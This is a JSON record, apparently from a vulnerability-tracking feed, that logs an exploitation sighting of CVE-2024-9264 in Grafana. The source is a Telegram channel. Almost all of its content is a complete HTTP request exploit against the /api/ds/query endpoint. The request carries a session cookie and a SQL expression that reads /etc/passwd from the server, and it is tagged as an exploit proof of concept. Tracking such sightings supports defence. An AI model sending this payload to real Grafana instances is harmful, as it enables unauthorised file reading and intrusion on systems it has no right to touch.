{"uuid": "ed5497f4-bc64-4b06-bb5e-4493b203c857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-9264", "type": "exploited", "source": "https://t.me/ckeArsenal/18", "content": "CVE-2024-9264\n\nPOST /api/ds/query?ds_type=expr&expression=true&requestId=Q100 HTTP/1.1\nHost: 127.0.0.1\nContent-Type: application/json\nCookie: grafana_session=a739fa9aeb235f2790f17de00fefe528\nContent-Length: 368\n\n{\n  \"from\": \"1696154400000\",\n  \"to\": \"1696345200000\",\n  \"queries\": [\n    {\n      \"datasource\": {\n        \"name\": \"Expression\",\n        \"type\": \"expr\",\n        \"uid\": \"expr\"\n      },\n      \"expression\": \"SELECT * FROM read_csv_auto('/etc/passwd');\",\n      \"hide\": false,\n      \"refId\": \"B\",\n      \"type\": \"sql\",\n      \"window\": \"\"\n    }\n  ]\n}\n\n/etc/passwd\n\n#exploit #poc", "creation_timestamp": "2024-11-18T09:06:32.000000Z"}